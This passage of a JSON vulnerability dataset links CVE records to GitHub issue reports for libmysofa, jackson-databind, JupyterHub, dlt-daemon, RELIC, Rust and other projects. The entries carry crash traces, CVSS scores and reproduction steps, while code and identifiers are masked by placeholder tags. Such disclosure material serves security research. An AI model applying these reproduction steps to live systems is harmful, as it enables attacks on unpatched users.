  60484. "description": "NULL pointer dereference in APITAG . Opening maliciously crafted file with mysofa_open leads to crash of the application. NULL pointer dereference in APITAG APITAG on variable attr >value causes segmentation fault. Message from gdb: > Program received signal SIGSEGV, Segmentation fault. > __strcmp_sse2_unaligned () at PATHTAG APITAG report on crash: ASAN:SIGSEG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f NUMBERTAG bf6b NUMBERTAG e bp NUMBERTAG fff NUMBERTAG sp NUMBERTAG fff NUMBERTAG a NUMBERTAG T NUMBERTAG f NUMBERTAG bf6b NUMBERTAG d ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in mysofa_loudness PATHTAG NUMBERTAG e NUMBERTAG in mysofa_open_default PATHTAG NUMBERTAG e NUMBERTAG in mysofa_open PATHTAG NUMBERTAG d4 in main libmysofa APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start (libmysofa APITAG File triggering crash (unzip before test): FILETAG Code snippet for reproduction: > int filter_length; > int err; > struct MYSOFA_EASY easy = NULL; > easy = mysofa_open(filename NUMBERTAG filter_length, &err); > APITAG %p err: %d \", easy, err); > mysofa_close(easy); Affected versions: master NUMBERTAG earlier versions have not been tested yet)",
  60485. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  60486. "severity": "MEDIUM",
  60487. "baseScore": 6.5,
  60488. "impactScore": 3.6,
  60489. "exploitabilityScore": 2.8
  60490. },
  60491. {
  60492. "CVE_ID": "CVE-2020-36149",
  60493. "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/137",
  60494. "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/137",
  60495. "Repo_new": "hoene/libmysofa",
  60496. "Issue_Created_At": "2020-08-26T15:56:07Z",
  60497. "description": "NULL pointer dereference in APITAG Opening maliciously crafted file with mysofa_open leads to crash of the application. NULL pointer dereference in APITAG APITAG on variable attr >value causes segmentation fault. Message from gdb: > Program received signal SIGSEGV, Segmentation fault. > __strcmp_sse2_unaligned () at PATHTAG APITAG report on crash: ASAN:SIGSEG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG fec7bf NUMBERTAG e bp NUMBERTAG ffee7ed NUMBERTAG sp NUMBERTAG ffee7ed NUMBERTAG T NUMBERTAG fec7bf NUMBERTAG d ( PATHTAG NUMBERTAG d6 in APITAG PATHTAG NUMBERTAG dc9 in APITAG PATHTAG NUMBERTAG dc9 in mysofa_tocartesian PATHTAG NUMBERTAG ea7 in mysofa_open_default PATHTAG NUMBERTAG ea7 in mysofa_open PATHTAG NUMBERTAG d4 in main libmysofa APITAG NUMBERTAG fec7b5ed NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start (libmysofa APITAG File triggering crash (unzip before test): FILETAG Code snippet for reproduction: > int filter_length; > int err; > struct MYSOFA_EASY easy = NULL; > easy = mysofa_open(filename NUMBERTAG filter_length, &err); > APITAG %p err: %d \", easy, err); > mysofa_close(easy); Affected versions: master NUMBERTAG earlier versions have not been tested yet)",
  60498. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  60499. "severity": "MEDIUM",
  60500. "baseScore": 6.5,
  60501. "impactScore": 3.6,
  60502. "exploitabilityScore": 2.8
  60503. },
  60504. {
  60505. "CVE_ID": "CVE-2020-36150",
  60506. "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/135",
  60507. "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/135",
  60508. "Repo_new": "hoene/libmysofa",
  60509. "Issue_Created_At": "2020-08-26T13:10:12Z",
  60510. "description": "Heap buffer overflow in loudness. Opening maliciously crafted file with mysofa_open leads to crash of the application. Heap buffer overread by NUMBERTAG bytes in APITAG ( PATHTAG ) cause segmentation fault. Message from gdb: > Program received signal SIGSEGV, Segmentation fault NUMBERTAG fcdc in loudness (in NUMBERTAG size NUMBERTAG at PATHTAG NUMBERTAG res += in in; > APITAG report on crash: > ASAN:SIGSEG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG d NUMBERTAG pc NUMBERTAG f bp NUMBERTAG ea6 sp NUMBERTAG fffe NUMBERTAG a NUMBERTAG f8 T NUMBERTAG e in loudness PATHTAG NUMBERTAG b6a2 in mysofa_loudness PATHTAG NUMBERTAG e NUMBERTAG in mysofa_open_default PATHTAG NUMBERTAG e NUMBERTAG in mysofa_open PATHTAG NUMBERTAG d4 in main libmysofa APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start (libmysofa APITAG File triggering crash (unzip before test): FILETAG Code snippet for reproduction: > int filter_length; > int err; > struct MYSOFA_EASY easy = NULL; > easy = mysofa_open(filename NUMBERTAG filter_length, &err); > APITAG %p err: %d \", easy, err); > mysofa_close(easy); Affected versions: master NUMBERTAG earlier versions have not been tested yet)",
  60511. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  60512. "severity": "MEDIUM",
  60513. "baseScore": 6.5,
  60514. "impactScore": 3.6,
  60515. "exploitabilityScore": 2.8
  60516. },
  60517. {
  60518. "CVE_ID": "CVE-2020-36151",
  60519. "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/134",
  60520. "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/134",
  60521. "Repo_new": "hoene/libmysofa",
  60522. "Issue_Created_At": "2020-08-25T18:42:17Z",
  60523. "description": "Heap buffer overflow in mysofa_resampler_reset_mem. Opening malicious file with mysofa_open leads to crash of the application. Heap buffer overflow is caused by zeroing memory block of size NUMBERTAG casted to unsigned) in mysofa_resampler_reset_mem APITAG APITAG report on crash NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG fbfc at pc NUMBERTAG f9a NUMBERTAG bec bp NUMBERTAG fffc1d NUMBERTAG sp NUMBERTAG fffc1d NUMBERTAG ae8 WRITE of size NUMBERTAG at NUMBERTAG fbfc thread T NUMBERTAG f9a NUMBERTAG beb in __asan_memset ( PATHTAG NUMBERTAG d in mysofa_resampler_reset_mem PATHTAG NUMBERTAG bfc4 in mysofa_resample PATHTAG NUMBERTAG a NUMBERTAG in mysofa_open_default PATHTAG NUMBERTAG a NUMBERTAG in mysofa_open PATHTAG NUMBERTAG c0a in main APITAG NUMBERTAG f9a NUMBERTAG f3e NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start APITAG File triggering crash (unzip before test): FILETAG Code snippet for reproduction: > int filter_length; > int err; > struct MYSOFA_EASY easy = NULL; > easy = mysofa_open(filename NUMBERTAG filter_length, &err); > APITAG %p err: %d \", easy, err); > mysofa_close(easy);",
  60524. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  60525. "severity": "MEDIUM",
  60526. "baseScore": 6.5,
  60527. "impactScore": 3.6,
  60528. "exploitabilityScore": 2.8
  60529. },
  60530. {
  60531. "CVE_ID": "CVE-2020-36152",
  60532. "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/136",
  60533. "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/136",
  60534. "Repo_new": "hoene/libmysofa",
  60535. "Issue_Created_At": "2020-08-26T15:33:36Z",
  60536. "description": "Stack buffer overflow in APITAG Incorrect use of sprintf on a too small buffer leads to a stack buffer overflow by NUMBERTAG bytes in APITAG This can lead to overwriting the next variable on the stack and logic errors in the application or crash in case of strong stack protection. GDB stacktrace NUMBERTAG ce in sprintf (__fmt NUMBERTAG APITAG __s NUMBERTAG fffffffcab0 \"REF NUMBERTAG at PATHTAG NUMBERTAG APITAG APITAG APITAG dt=dt APITAG ds=ds APITAG at PATHTAG NUMBERTAG c4b in APITAG (reader NUMBERTAG fffffffd NUMBERTAG da NUMBERTAG fffffffcb NUMBERTAG dt NUMBERTAG fffffffcb NUMBERTAG ds NUMBERTAG fffffffcbb0, dim=dim APITAG at PATHTAG NUMBERTAG dc4 in APITAG APITAG da=da APITAG dt=dt APITAG ds=ds APITAG at PATHTAG NUMBERTAG aa7 in APITAG APITAG dataobject NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG in APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG e5 in APITAG (end NUMBERTAG dataobject=<optimized out>, reader NUMBERTAG fffffffd NUMBERTAG at PATHTAG NUMBERTAG APITAG (dataobject=<optimized out>, reader NUMBERTAG fffffffd NUMBERTAG at PATHTAG NUMBERTAG APITAG APITAG APITAG end_of_messages NUMBERTAG at PATHTAG NUMBERTAG e7 in APITAG APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG d NUMBERTAG in APITAG APITAG APITAG dataobject NUMBERTAG fffffffd NUMBERTAG dataobject NUMBERTAG fffffffd NUMBERTAG at PATHTAG NUMBERTAG c9 in APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG ef in APITAG APITAG APITAG name=name APITAG at PATHTAG NUMBERTAG ebde in APITAG APITAG APITAG at PATHTAG NUMBERTAG f6ab in APITAG APITAG APITAG at PATHTAG NUMBERTAG bb6c in mysofa_load APITAG APITAG err=err APITAG at PATHTAG NUMBERTAG d NUMBERTAG in mysofa_open_default APITAG neighbor_angle_step NUMBERTAG APITAG err NUMBERTAG fffffffd NUMBERTAG filterlength NUMBERTAG fffffffd NUMBERTAG samplerate=<optimized out>, filename NUMBERTAG fffffffdb NUMBERTAG APITAG at PATHTAG NUMBERTAG mysofa_open (filename NUMBERTAG fffffffdb NUMBERTAG APITAG APITAG APITAG err=err APITAG at PATHTAG NUMBERTAG d5 in main (argc NUMBERTAG arg NUMBERTAG fffffffd NUMBERTAG at APITAG File triggering crash (unzip before test): FILETAG Code snippet for reproduction: > int filter_length; > int err; > struct MYSOFA_EASY easy = NULL; > easy = mysofa_open(filename NUMBERTAG filter_length, &err); > APITAG %p err: %d \", easy, err); > mysofa_close(easy); Solution: Make the number buffer larger, use snprintf with the size of the number buffer and check the value returned by snprintf!",
  60537. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  60538. "severity": "HIGH",
  60539. "baseScore": 8.8,
  60540. "impactScore": 5.9,
  60541. "exploitabilityScore": 2.8
  60542. },
  60543. {
  60544. "CVE_ID": "CVE-2020-36179",
  60545. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/3004",
  60546. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/3004",
  60547. "Repo_new": "fasterxml/jackson-databind",
  60548. "Issue_Created_At": "2021-01-01T01:03:14Z",
  60549. "description": "Block one more DBCP related potential gadget class. (note: placeholder until verified) One gadget type related to Apache DBCP NUMBERTAG was reported as possible gadget type and should be blocked (it may or may not allow vuln on its own). See URLTAG for description of the general problem. Reporter(s): Al1ex MENTIONTAG Mitre id: [not yet allocated] Fix will be included in NUMBERTAG usable via jackson bom version ) Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  60550. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  60551. "severity": "HIGH",
  60552. "baseScore": 8.1,
  60553. "impactScore": 5.9,
  60554. "exploitabilityScore": 2.2
  60555. },
  60556. {
  60557. "CVE_ID": "CVE-2020-36183",
  60558. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/3003",
  60559. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/3003",
  60560. "Repo_new": "fasterxml/jackson-databind",
  60561. "Issue_Created_At": "2021-01-01T00:43:41Z",
  60562. "description": "Block one more gadget type (xxx, CVE to be allocated). Another gadget type(s) reported regarding class(es) of [to be added] library. See URLTAG for description of the general problem. Reporter(s): (to be added) Mitre id: [not yet allocated] Note: derivative of NUMBERTAG embedded Xalan) Fix will be included in NUMBERTAG usable via jackson bom version ) Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  60563. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  60564. "severity": "HIGH",
  60565. "baseScore": 8.1,
  60566. "impactScore": 5.9,
  60567. "exploitabilityScore": 2.2
  60568. },
  60569. {
  60570. "CVE_ID": "CVE-2020-36191",
  60571. "Issue_Url_old": "https://github.com/jupyterhub/jupyterhub/issues/3304",
  60572. "Issue_Url_new": "https://github.com/jupyterhub/jupyterhub/issues/3304",
  60573. "Repo_new": "jupyterhub/jupyterhub",
  60574. "Issue_Created_At": "2020-12-11T02:02:14Z",
  60575. "description": "Anti CSRF token is not working in Admin panel. Bug description In APITAG Admin panel, the _xsrf token is not working for add/delete user features. Current mechanism to protect add/delete user features against CSRF attack is solely rely on checking the Referer header value. Although current referer header examination seems to be strict enough, it could still be bypassed if user is fooled to install malicious browser plugin or there exists any escape techniques. Expected behaviour Implement anti CSRF techniques like Double Submit Cookie, so that APITAG could prevent CSRF attack. Actual behaviour Even if the _xsrf token is removed the add/delete user requests could still be accepted & processed by server. That could lead to a possible CSRF attack. Screen Capture of successfully adding user without _xsrf token FILETAG Screen Capture of successfully deleting user without _xsrf token FILETAG How to reproduce NUMBERTAG Log in APITAG console with admin privilege NUMBERTAG Click Control Panel button NUMBERTAG Click Admin tab NUMBERTAG Click Add User button / Delete User button NUMBERTAG Use proxy technique to intercept the packet sent NUMBERTAG Modify the packet by removing the _xsrf token NUMBERTAG Send the request & see the request is accepted Your personal set up OS: Kubernetes NUMBERTAG Helm charts NUMBERTAG ubi NUMBERTAG ersion(s): APITAG NUMBERTAG Python NUMBERTAG",
  60576. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N",
  60577. "severity": "MEDIUM",
  60578. "baseScore": 4.5,
  60579. "impactScore": 3.6,
  60580. "exploitabilityScore": 0.9
  60581. },
  60582. {
  60583. "CVE_ID": "CVE-2020-36192",
  60584. "Issue_Url_old": "https://github.com/mantisbt-plugins/source-integration/issues/344",
  60585. "Issue_Url_new": "https://github.com/mantisbt-plugins/source-integration/issues/344",
  60586. "Repo_new": "mantisbt-plugins/source-integration",
  60587. "Issue_Created_At": "2020-10-12T07:43:38Z",
  60588. "description": "Attacker can disclose the status of private issue . Description This issue allows the attacker to disclose the current status of a private report by attaching it on the attach issues field. Assume you successfully install the Source Integration, as attacker go to Repositories Go to changesets Look for the Attach Issues field Assume you know the id of the private issue insert it Request CODETAG Response ERRORTAG By default the issue is not crossed out (if the issue is recently send/not modified) Click the details button It will redirect to APITAG where the attach issue will also include. In this case my issue get resolved so the color indicator is green If we click the issue it will just return Access Denied. At first I get confuse if this is a default feature or not but I guess if this is not an issue please validate the type of issue (check if public/private issue)",
  60589. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  60590. "severity": "MEDIUM",
  60591. "baseScore": 5.3,
  60592. "impactScore": 1.4,
  60593. "exploitabilityScore": 3.9
  60594. },
  60595. {
  60596. "CVE_ID": "CVE-2020-36193",
  60597. "Issue_Url_old": "https://github.com/pear/Archive_Tar/issues/35",
  60598. "Issue_Url_new": "https://github.com/pear/archive_tar/issues/35",
  60599. "Repo_new": "pear/archive_tar",
  60600. "Issue_Created_At": "2021-02-02T17:56:36Z",
  60601. "description": "relative symlinks APITAG of path file extraction) with new commit cde NUMBERTAG ff NUMBERTAG ERRORTAG b5b3ccb NUMBERTAG e9b NUMBERTAG de NUMBERTAG Hi, I've been trying to install twofactor_webauthn in APITAG but kept getting an error APITAG not extract app twofactor_webauthn\". APITAG doesn't seem to report the msg from the _error function in APITAG I'm not looking in the right place?), but I modified the _error function to log it to file and caught this problem: Out of path file extraction PATHTAG > PATHTAG That symlink is not out of path, so I'm not sure why it's failing. Here is a link to the tarball to investigate if desired: FILETAG And here is a link to the bug report on the APITAG app: URLTAG Thanks! Rick",
  60602. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  60603. "severity": "HIGH",
  60604. "baseScore": 7.5,
  60605. "impactScore": 3.6,
  60606. "exploitabilityScore": 3.9
  60607. },
  60608. {
  60609. "CVE_ID": "CVE-2020-36242",
  60610. "Issue_Url_old": "https://github.com/pyca/cryptography/issues/5615",
  60611. "Issue_Url_new": "https://github.com/pyca/cryptography/issues/5615",
  60612. "Repo_new": "pyca/cryptography",
  60613. "Issue_Created_At": "2020-12-09T15:02:20Z",
  60614. "description": "Fernet fails to encrypt/decrypt large data. Hello, Thank you for this fine library. I've been having some issues when encrypting large data APITAG using the Fernet class. There seems to be several failure modes, I've seen everything from a segfault, SIGABRT to the decrypted plaintext differing from the original plaintext. Please note that I've had some issues with the RAM on my computer (so that could potentially be the source of _some_ of the failures), but I've verified at least the SIGABRT failures on three different computers. It seems to me that the issue seems to be an integer overflow in APITAG but I'm not sure if Cryptography is at fault for passing an integer that is too large, or APITAG is at fault for not checking the integer, or a combination. If you think this should be fixed in APITAG please let me know how to best report the issue to them. Please see the attached script for more detailed information, as I think it speaks for itself NUMBERTAG Software versions: Python NUMBERTAG APITAG NUMBERTAG h cryptography NUMBERTAG cffi NUMBERTAG pip NUMBERTAG setuptools NUMBERTAG Installed cryptography through pip To reproduce: ERRORTAG",
  60615. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  60616. "severity": "CRITICAL",
  60617. "baseScore": 9.1,
  60618. "impactScore": 5.2,
  60619. "exploitabilityScore": 3.9
  60620. },
  60621. {
  60622. "CVE_ID": "CVE-2020-36244",
  60623. "Issue_Url_old": "https://github.com/GENIVI/dlt-daemon/issues/265",
  60624. "Issue_Url_new": "https://github.com/covesa/dlt-daemon/issues/265",
  60625. "Repo_new": "covesa/dlt-daemon",
  60626. "Issue_Created_At": "2020-11-02T18:38:23Z",
  60627. "description": "write heap buffer overflow in dlt_buffer_write_block. Hello, I have fuzzed dlt daemon to search for bugs using the Tool CI Fuzz. I think I found a write heap buffer overflow in the function dlt_buffer_write_block. You can find the full crash report below. This is from a fuzz test I wrote to execute the function dlt_buffer_push with fuzzer generated inputs. After having a look at the code it seems that there is no size check before writing to the ring buffer: There is no check if size APITAG size in dlt_buffer_write_block. As far as I can say this condition isn't checked elsewhere. Since buffer overflows can often be used to get arbitrary code execution this is a potential security issue. Using the dlt_daemon_client_send function a connected dlt user could write into the memory of the daemon and possibly gain arbitrary code execution. I think this could be fixed by changing the if condition in APITAG (in function dlt_buffer_push3) into a while loop. If you need further information or discussion I'm happy to help as far as I can NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ec NUMBERTAG at pc NUMBERTAG bp NUMBERTAG ffca5a NUMBERTAG a NUMBERTAG sp NUMBERTAG ffca5a NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ec NUMBERTAG thread T NUMBERTAG f in __asan_memcpy PATHTAG NUMBERTAG fe NUMBERTAG a1c NUMBERTAG b in dlt_buffer_write_block PATHTAG NUMBERTAG fe NUMBERTAG a1cf7b9 in dlt_buffer_push3 PATHTAG NUMBERTAG fe NUMBERTAG a1cd2ca in dlt_buffer_push PATHTAG NUMBERTAG c5cda in APITAG PATHTAG NUMBERTAG feb NUMBERTAG in APITAG char const , unsigned long) PATHTAG NUMBERTAG fe2a5 in APITAG char const , unsigned long, bool, APITAG , bool ) PATHTAG NUMBERTAG bc7 in APITAG APITAG >&) PATHTAG NUMBERTAG f NUMBERTAG in APITAG APITAG >&) PATHTAG NUMBERTAG efbee in APITAG , char , int ( )(unsigned char const , unsigned long)) PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG fe NUMBERTAG bb NUMBERTAG b2 in __libc_start_main ( PATHTAG NUMBERTAG de5d in _start ( PATHTAG NUMBERTAG ec NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG d in malloc PATHTAG NUMBERTAG fe NUMBERTAG a1c5f2e in dlt_buffer_increase_size PATHTAG NUMBERTAG fe NUMBERTAG a1cec2f in dlt_buffer_push3 PATHTAG NUMBERTAG fe NUMBERTAG a1cd2ca in dlt_buffer_push PATHTAG NUMBERTAG c5cda in APITAG PATHTAG NUMBERTAG feb NUMBERTAG in APITAG char const , unsigned long) PATHTAG NUMBERTAG fe2a5 in APITAG char const , unsigned long, bool, APITAG , bool ) PATHTAG NUMBERTAG bc7 in APITAG APITAG >&) PATHTAG NUMBERTAG f NUMBERTAG in APITAG APITAG >&) PATHTAG NUMBERTAG efbee in APITAG , char , int ( )(unsigned char const , unsigned long)) PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG fe NUMBERTAG bb NUMBERTAG b2 in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG in __asan_memcpy Shadow bytes around the buggy address NUMBERTAG c4c NUMBERTAG b NUMBERTAG c4c NUMBERTAG c NUMBERTAG c4c NUMBERTAG d NUMBERTAG c4c NUMBERTAG e NUMBERTAG c4c NUMBERTAG f NUMBERTAG c4c NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c4c NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c4c NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c4c NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c4c NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c4c NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING MS NUMBERTAG base unit: APITAG artifact_prefix='./'; Test unit written to ./crash APITAG",
  60628. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  60629. "severity": "CRITICAL",
  60630. "baseScore": 9.8,
  60631. "impactScore": 5.9,
  60632. "exploitabilityScore": 3.9
  60633. },
  60634. {
  60635. "CVE_ID": "CVE-2020-36245",
  60636. "Issue_Url_old": "https://github.com/GramAddict/bot/issues/134",
  60637. "Issue_Url_new": "https://github.com/gramaddict/bot/issues/134",
  60638. "Repo_new": "gramaddict/bot",
  60639. "Issue_Created_At": "2020-12-08T10:55:40Z",
  60640. "description": "Running APITAG lets anyone on the network control/view your device!. When using uiautomator2 URLTAG , which is what APITAG is based around, it silently installs the application ATX Agent URLTAG on your device, which opens a webserver on TCP port NUMBERTAG that lets anyone on the network, with ZERO form of authentication, execute code, install apps, download private data etc. on your device and view the screen remotely. As soon as you're running APITAG this webserver is started. This is a HUGE security concern , and should be addressed immediately! Try it yourself NUMBERTAG Find the Wi Fi IP address of your device: APITAG (NOTE: It is trivial for anyone on the same network to discover your device and the running webserver NUMBERTAG Run APITAG as ususal NUMBERTAG Using another device on the same network, go to APITAG in your browser. This is what you're presented with: APITAG APITAG _(censored for my privacy)_ APITAG APITAG showing the API page, as it exposes too much personal info. You can view its endpoints and capabilities at the ATX Agent page linked above) This is extremely worrying!",
  60641. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  60642. "severity": "HIGH",
  60643. "baseScore": 8.8,
  60644. "impactScore": 5.9,
  60645. "exploitabilityScore": 2.8
  60646. },
  60647. {
  60648. "CVE_ID": "CVE-2020-36282",
  60649. "Issue_Url_old": "https://github.com/rabbitmq/rabbitmq-jms-client/issues/135",
  60650. "Issue_Url_new": "https://github.com/rabbitmq/rabbitmq-jms-client/issues/135",
  60651. "Repo_new": "rabbitmq/rabbitmq-jms-client",
  60652. "Issue_Created_At": "2020-11-02T10:38:12Z",
  60653. "description": "Limit APITAG deserialization. APITAG should use the same \"white list\" mechanism as APITAG to avoid some arbitrary code execution on deserialization. Even though APITAG is supposed to handle only primitive types, it is still to possible to send a message that contains an arbitrary serializable instance. The consuming application application may then execute code from this class on deserialization. The fix consists in using the list of trusted packages that can be set at the connection factory level.",
  60654. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  60655. "severity": "CRITICAL",
  60656. "baseScore": 9.8,
  60657. "impactScore": 5.9,
  60658. "exploitabilityScore": 3.9
  60659. },
  60660. {
  60661. "CVE_ID": "CVE-2020-36315",
  60662. "Issue_Url_old": "https://github.com/relic-toolkit/relic/issues/154",
  60663. "Issue_Url_new": "https://github.com/relic-toolkit/relic/issues/154",
  60664. "Repo_new": "relic-toolkit/relic",
  60665. "Issue_Created_At": "2020-06-29T14:10:21Z",
  60666. "description": "PKCS NUMBERTAG implementation and Bleichenbacher style small exponent signature forgery. Hi there, As I was testing the PKCS NUMBERTAG implementation inside RELIC, it appears to me that it might be susceptible to a Bleichenbacher style small exponent signature forgery. In a nut shell, there are mainly NUMBERTAG issues in the code (both in APITAG ) that enables the attack NUMBERTAG The checks on the first NUMBERTAG bytes to see whether they are indeed APITAG actually doesn't lead to rejection of malformed inputs. Although line NUMBERTAG URLTAG and line NUMBERTAG URLTAG will set APITAG if the prefix bytes do not match the expectation, the result variable is never checked later and will get overwritten on line NUMBERTAG URLTAG , hence the first NUMBERTAG bytes can take any arbitrary values and the signature verification will still go through NUMBERTAG More importantly, the APITAG loop on line NUMBERTAG URLTAG only checks that the padding has not been terminated with a zero, but it doesn't actually require the each of the padding bytes to be APITAG , and because of this, the padding can take arbitrary non zero values and the signature verification will still go through. Together, this opens up the possibility of a Bleichenbacher style small exponent signature forgery. Here is a proof of concept forgery attack, based on the APITAG given in the source tree: ERRORTAG For convenience I used a somewhat unconventional sized NUMBERTAG bit long) modulus. I used APITAG to generate it, but you can try it with a different NUMBERTAG bit long modulus and the forged signature should still work. The forgery algorithm should also work against \"regular\" sized (e.g NUMBERTAG bit and NUMBERTAG bit long) moduli, though I have yet to have a chance to work on that, and I think the above proof of concept already serves the purpose. Such a forgery should only work when e is small enough (which in most cases means APITAG ), and although RELIC by default doesn't generate RSA keys with APITAG , there is a possibility that someone might use APITAG for specific application & interoperability needs, and nothing in the API is prohibiting the programming from doing it. In any case, unless the plan is to completely drop the support of PKCS NUMBERTAG I'd suggest to have the issues in APITAG fixed, as it is definitely possible (and not really that difficult) to make the signature verification much more robust. More details on the Bleichenbacher style signature forgery can be found in academic papers like FILETAG and FILETAG . Finally, though it shouldn't matter much, this is the script I used ( APITAG ) to configure the build: CODETAG",
  60667. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  60668. "severity": "MEDIUM",
  60669. "baseScore": 5.3,
  60670. "impactScore": 1.4,
  60671. "exploitabilityScore": 3.9
  60672. },
  60673. {
  60674. "CVE_ID": "CVE-2020-36316",
  60675. "Issue_Url_old": "https://github.com/relic-toolkit/relic/issues/155",
  60676. "Issue_Url_new": "https://github.com/relic-toolkit/relic/issues/155",
  60677. "Repo_new": "relic-toolkit/relic",
  60678. "Issue_Created_At": "2020-06-29T14:31:53Z",
  60679. "description": "buffer overflow in PKCS NUMBERTAG signature verification. Actually besides the problems mentioned in NUMBERTAG there seems to be additional problems in the PKCS NUMBERTAG signature verification code that can lead to a buffer overflow attack. Although the variable APITAG is set according to prior knowledge on line NUMBERTAG URLTAG , it will actually be overwritten on line NUMBERTAG URLTAG by the call to APITAG . And because APITAG doesn't require that the padding is NUMBERTAG at least NUMBERTAG byte long NUMBERTAG long enough so that there'd be no extra trailing bytes after the hash value, the value of APITAG can be set to a really small number when given a malformed signature with really short padding. Then on line NUMBERTAG URLTAG it is possible to have APITAG to be a really large value, larger than the size of APITAG allocated on line NUMBERTAG URLTAG , which can lead to a buffer overflow. Similar problems of not requiring a padding with appropriate length was found in some other implementations before, and that can usually be exploited for signature forgery (like in Bleichenbacher's original attack URLTAG . However, in this case it will induce a buffer overflow instead because of how APITAG was used to calculate the size of a subsequent buffer write (though I suspect the variable result might be set to APITAG after line NUMBERTAG URLTAG . Here's a proof of concept code demonstrating the problem, which should give a Segmentation Fault upon the completion of the signature verification: ERRORTAG",
  60680. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  60681. "severity": "MEDIUM",
  60682. "baseScore": 5.5,
  60683. "impactScore": 3.6,
  60684. "exploitabilityScore": 1.8
  60685. },
  60686. {
  60687. "CVE_ID": "CVE-2020-36317",
  60688. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/78498",
  60689. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/78498",
  60690. "Repo_new": "rust-lang/rust",
  60691. "Issue_Created_At": "2020-10-28T19:14:36Z",
  60692. "description": "String::retain allows safely creating invalid (non utf8) strings when abusing panic. While APITAG executes it may temporarily leave the String in an inconsistent state, in particular it may contain invalid utf8. This is safe because it restores this invariant before returning, but the caller may skip this by panicing inside the closure and catching the unwind it outside. This allows to create String s that are not utf8, breaking the library invariant without using ERRORTAG . For example the following will panic at the final assertion, while I would expect it to never fail when s has type String : ERRORTAG",
  60693. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  60694. "severity": "HIGH",
